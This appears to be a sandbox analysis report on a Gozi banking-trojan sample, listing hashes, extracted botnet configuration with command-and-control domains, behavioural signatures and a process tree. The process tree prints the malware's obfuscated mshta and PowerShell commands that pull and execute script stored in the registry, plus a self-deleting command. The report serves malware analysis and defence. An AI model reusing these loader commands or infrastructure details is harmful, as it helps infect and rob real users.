Overview

overview

10

Static

static

3

7665e79318...e6.exe

windows7-x64

10

7665e79318...e6.exe

windows10-2004-x64

10

Resubmissions

07-10-2023 03:42

231007-d9vl2sha5z 10

07-10-2023 02:04

231007-chrweabb25 10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-10-2023 02:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe

  • Size

    304KB

  • MD5

    a3f4c907a088c99a8b7bf5f4280d7d0c

  • SHA1

    9a9297bd0af1c008eb7477c1e310ce70c30c6d56

  • SHA256

    7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6

  • SHA512

    106a0a4275a421a6dbef6c43e76921e6eae1aca5f6d960f823763a3127b7ebf826c626da460db82451aba4a94c32c8c198d6871b0a2c6de7d96c937384e92f9b

  • SSDEEP

    6144:Oo+91vDNpa6NK56upTHirwtc3nhBvjQOR/Oz2IHTN+:ONDLu4K56u1HqfhBvjQOWz2W

Score
10/10
gozi5050bankerdaveisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Dave packer 1 IoCs

    Detects executable using a packer named 'Dave' by the community, based on a string at the end.

    dave
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3644
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:5000
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4016
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3148
        • C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
          "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1572
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Hryv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hryv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3936
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjoinbnudt -value gp; new-alias -name exrvxvw -value iex; exrvxvw ([System.Text.Encoding]::ASCII.GetString((gjoinbnudt "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4392
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3msbizu1\3msbizu1.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1800
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD33E.tmp" "c:\Users\Admin\AppData\Local\Temp\3msbizu1\CSC3E2AE3DAD51C4650BD4DB5FFF7C50A0.TMP"
                5⤵
                  PID:4356
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cv2fzk4x\cv2fzk4x.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2352
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4E4.tmp" "c:\Users\Admin\AppData\Local\Temp\cv2fzk4x\CSC95479FA13D5D49219B67D2655FEF9DD.TMP"
                  5⤵
                    PID:4548
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3680
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3412
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:3560
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:1468
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
              1⤵
                PID:1784
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3668

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\3msbizu1\3msbizu1.dll
                Filesize

                3KB

                MD5

                445073a3445e876890c209e75d85559e

                SHA1

                ca7a45c21f480afa00dc93e88272df635e876eb2

                SHA256

                f966af17c6f31aa3ab9ca017f3f0b00bbed5eb2eda78073f222868931c1fc31e

                SHA512

                880259b7a958876a8bc460adb9f1265830250db5f8e57e45ab1d9e3828467d644aedced5879d5c4cd0234c4960d9c5d103c16786438c989ed8697e41528b0840

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESD33E.tmp
                Filesize

                1KB

                MD5

                5b31716e6d14968d2744cd804bb9add8

                SHA1

                1c291ac4aa0152b909cafc4b15cee6700445ad79

                SHA256

                8b62f6caa975d2da8919891586a89d5350d0c76a39e50da7651d32e5a83824b9

                SHA512

                be75061a3be15f4b81b8809bf16d48e7757231b0687c160dcb46a5c1a1f2afad43eee746f89889e7a56af0317f67f3722189a25c7de684aa4d1fa95ffba06eb3

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESD4E4.tmp
                Filesize

                1KB

                MD5

                49f78c0189c32e08e6a55be1d80306b4

                SHA1

                fb57c869ccba6104c296fe1ebd572f5829375eb7

                SHA256

                d39d0e6a99c225873ed6cb561b28d35df54dd0448fca7d7f7642c1fa3b827b53

                SHA512

                210955b379552808634530dfb61f7ecbe2f4ef2b377740117b89723b7ae82ca9e0a8d24a21e93825bc9826912a473282e2c0dc26acafd6680f3d6ce5efb8dc52

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_maq1o0ic.3lj.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\cv2fzk4x\cv2fzk4x.dll
                Filesize

                3KB

                MD5

                a6cd1c2abc4a891203e818d101335d36

                SHA1

                509f30a3481b76e4a803ecb8947ff4e82154292b

                SHA256

                70a4ef0e3d0c9444550b716cb8d0ff86b03a994dcad790bbb24813610cd3472e

                SHA512

                d73c00a4f212ae192c3b6681fac12f06cd98880a2d745dd618a56e59db423612080361a54031c688b76421d8176b70a7240747376abc89380fa4496e1baf9834

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\3msbizu1\3msbizu1.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\3msbizu1\3msbizu1.cmdline
                Filesize

                369B

                MD5

                4cca5e970e7297f7dc4ddf3d43501c73

                SHA1

                5cecff0785d78fd2dd3e3c0a71b24d85aca32ec3

                SHA256

                aaa171b2497b1996262b70035c0cfc3f958027f98a3219652856069ec14720da

                SHA512

                7d6461b6bf3e153e55de758d9ab944abefb53a63612859188111995a6e66a5fa5015ce1132a2ae8b1fbf03074276cf7852cc5cd83110996811c706e52063fff4

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\3msbizu1\CSC3E2AE3DAD51C4650BD4DB5FFF7C50A0.TMP
                Filesize

                652B

                MD5

                8e47a05a864c7a1d899da41b4fd1ac6c

                SHA1

                23951f4ca54f3818c7233ab5705c216ccb161a82

                SHA256

                65ec31878bdbbd77518f069ce85bc29d67858252980a2bb85fb8c0e6a4a54449

                SHA512

                c75c5d2d5d277d1a079aeffb09bb7016d8d71c72499493307463537f9fbe34526acdea6ab2de50b2830feb6d887ee22782af2c9b8c4bc04affd0b5391fe7d9db

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\cv2fzk4x\CSC95479FA13D5D49219B67D2655FEF9DD.TMP
                Filesize

                652B

                MD5

                7597f467e985b16dc600f72f8f7a9e6c

                SHA1

                55dc542926be94f2835ff37eabb795ca55e5f5cb

                SHA256

                534186a7ebc4cc01d40c8efc3f61756e3d54f44b13d6da57f1cde947fd5bce30

                SHA512

                1ac4c2badee584b2e61cc054beae1a40db50776a0db9a1d8c3f576dec26f130bc0565900bd8c8fb34c61efd91b13719d926193368d9406601b39d154b16c1496

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\cv2fzk4x\cv2fzk4x.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\cv2fzk4x\cv2fzk4x.cmdline
                Filesize

                369B

                MD5

                9ffbbbe60d277a80c9811d119d44801e

                SHA1

                5212a43672b1d53c46acae0eb92f6f64c9d65d53

                SHA256

                677ce12df3d303b4c3568cf308d74686742910505c4c45ba09946235b3f83a7c

                SHA512

                a638cb9ede7f36b6769ebab0b6a004c668988a9d5314d572f68dd196cefce37dc42f3c623e3987576c9978f075e5f455fc1c4abea1f891b1556b6fb06bf7f0e7

                Download Submit
              • memory/1468-97-0x000001CED2740000-0x000001CED27E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1468-107-0x000001CED2270000-0x000001CED2271000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1468-111-0x000001CED2740000-0x000001CED27E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1572-0-0x00000000009B0000-0x00000000009BF000-memory.dmp
                Filesize

                60KB

                Download
              • memory/1572-11-0x00000000024E0000-0x00000000024ED000-memory.dmp
                Filesize

                52KB

                Download
              • memory/1572-5-0x0000000002470000-0x000000000247F000-memory.dmp
                Filesize

                60KB

                Download
              • memory/1572-1-0x00000000009A0000-0x00000000009AC000-memory.dmp
                Filesize

                48KB

                Download
              • memory/3148-59-0x00000000085C0000-0x0000000008664000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3148-119-0x00000000085C0000-0x0000000008664000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3148-60-0x0000000000700000-0x0000000000701000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3412-115-0x000001EF43370000-0x000001EF43371000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3412-118-0x000001EF434A0000-0x000001EF43544000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3412-104-0x000001EF434A0000-0x000001EF43544000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3560-116-0x00000000016B0000-0x0000000001748000-memory.dmp
                Filesize

                608KB

                Download
              • memory/3560-102-0x00000000016B0000-0x0000000001748000-memory.dmp
                Filesize

                608KB

                Download
              • memory/3560-114-0x00000000016B0000-0x0000000001748000-memory.dmp
                Filesize

                608KB

                Download
              • memory/3560-113-0x0000000001320000-0x0000000001321000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3644-73-0x00000261FA880000-0x00000261FA881000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3644-120-0x00000261FA8D0000-0x00000261FA974000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3644-71-0x00000261FA8D0000-0x00000261FA974000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3668-138-0x0000020C3D440000-0x0000020C3D450000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3680-117-0x00000201C1120000-0x00000201C1121000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3680-88-0x00000201C11A0000-0x00000201C1244000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3680-105-0x00000201C11A0000-0x00000201C1244000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4016-79-0x00000156236D0000-0x00000156236D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4016-78-0x0000015623710000-0x00000156237B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4016-121-0x0000015623710000-0x00000156237B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4392-74-0x00000182B00B0000-0x00000182B00ED000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4392-21-0x00000182B0050000-0x00000182B0072000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4392-25-0x00007FF93C540000-0x00007FF93D001000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4392-26-0x00000182AFF40000-0x00000182AFF50000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4392-72-0x00007FF93C540000-0x00007FF93D001000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4392-41-0x0000018297AD0000-0x0000018297AD8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4392-27-0x00000182AFF40000-0x00000182AFF50000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4392-57-0x00000182B00B0000-0x00000182B00ED000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4392-55-0x00000182B00A0000-0x00000182B00A8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4392-28-0x00000182AFF40000-0x00000182AFF50000-memory.dmp
                Filesize

                64KB

                Download
              • memory/5000-103-0x0000029307160000-0x0000029307204000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5000-86-0x0000029307160000-0x0000029307204000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5000-87-0x0000029306F40000-0x0000029306F41000-memory.dmp
                Filesize

                4KB

                Download